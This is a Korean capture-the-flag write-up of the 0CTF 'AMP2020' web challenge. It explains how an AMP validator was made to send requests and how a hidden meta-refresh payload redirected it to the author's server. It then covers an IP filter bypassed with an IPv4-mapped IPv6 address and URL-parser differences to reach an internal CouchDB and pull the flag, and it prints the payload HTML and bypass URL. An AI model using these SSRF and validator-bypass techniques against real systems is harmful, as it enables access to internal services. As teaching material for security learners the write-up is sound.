AMP2020 writeup

CTF
Web

라온화이트햇 핵심연구팀 강인욱

0CTF에서 나온 문제중 하나로 AMP(Accelerated Mobile Pages)를 사용하는 문제이다. AMP 는 빠른 모바일 페이지를 위해 구글에서 만든 포맷이다.

그래서 몇가지 제약사항이 있다.

  1. CSS는 모두 인라인으로 지정해야 하며 50KB를 넘을 수 없다.
  2. 스크립트는 만 사용해야 하며, 추가적인 amp 태그를 사용하려면 amp에서 제공하는 스크립트를 추가하면 사용할 수 있다.
  3. 기본 HTML 태그 대신 , , 같은 AMP 전용 태그를 사용한다.

플래그를 얻기 위해선 다음과 같은 루트를 타야한다.

  1. AMP Validator에서 HTTP Request를 발생시킨다.
  2. IP제한을 우회하고 HTTP Request를 발생시켜서 내부 CouchDB Web API에 접속할 수 있도록 한다.
  3. CouchDB에서 플래그를 가져온다.

AMP 관련 문서 : https://amp.dev/

위 링크에서 설명하기를 추가적인 AMP 태그를 사용하려면 아래와 같이 custom-element 를 추가해주고 관련 스크립트를 추가해줘야 한다고 나와있다.

<script async custom-element="amp-ad" src="https://cdn.ampproject.org/v0/amp-ad-0.1.js"></script>

문서에서는 무조건 추가해주어야 한다고 나와있어서 아래의 실제 문제 출제자의 풀이처럼 이용하지는 않았다. (기존 버전과 호환성을 위해 스크립트를 추가를 안해줘도 동작을 한다나…)

출제자가 사용한 amp-ad 태그( HTTP Request )

  <amp-ad
    width="728"
    height="90"
    type="f1h"
    data-section-id="100"
    data-slot="107"
    data-custom='{"my_custom_param":"my_custom_value"}'
    data-pubnetwork-lib="https://YOUR_WEBSITE"
  >
  </amp-ad>

스크립트를 실행시킬 방법을 찾기위해 meta 태그를 이용해 내 서버로 이동시키려고 하였고 삽질끝에 아래와 같이 이동시킬 수 있었다.

<!doctype html>
<html amp lang="en">
  <head>
    <meta charset="utf-8">
    <script async src="https://cdn.ampproject.org/v0.js"></script>
    <title>Hello, AMPs</title>
    
    
      <noscript> <style amp-boilerplate>body{-webkit-animation:none;-moz-animation:none;-ms-animation:none;animation:none}</style> 
      <!--  </noscript> <meta http-equiv="refresh" content="0;url=http://wuq.kr/zxdasdzcz"> --></noscript>
    
    <link rel="canonical" href="https://amp.dev/documentation/guides-and-tutorials/start/create/basic_markup/">
    <meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1">
    <style amp-boilerplate>body{-webkit-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-moz-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-ms-animation:-amp-start 8s steps(1,end) 0s 1 normal both;animation:-amp-start 8s steps(1,end) 0s 1 normal both}@-webkit-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-moz-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-ms-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-o-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}</style>
  </head>
  <body>
    <h1>Welcome to the mobile web</h1>
  </body>
</html>

자바스크립트를 사용할 수 있으면 내부 서버에 데이터를 요청할 수 있으므로 CouchDB Web API에 접근할 수 있다.

APM2020 NodeJS 소스에서 IP 우회를 하려면 아래와 같이 할 수 있다.

const parsed = new URL(url)
const parsed2 = new UrlParse(url)

(isIp(host2) && IP.isPublic(host) && IP.isPublic(host2))

http://${database}:${password}@[::ffff:ac1e:103]:5984/

그리고 NodeJS axios 에서 인자에 배열을 이용해 옵션을 추가할 수 있으므로 GET, POST, PUT 메소드 등을 이용해 CouchDB 에서 플래그를 가져오면 된다.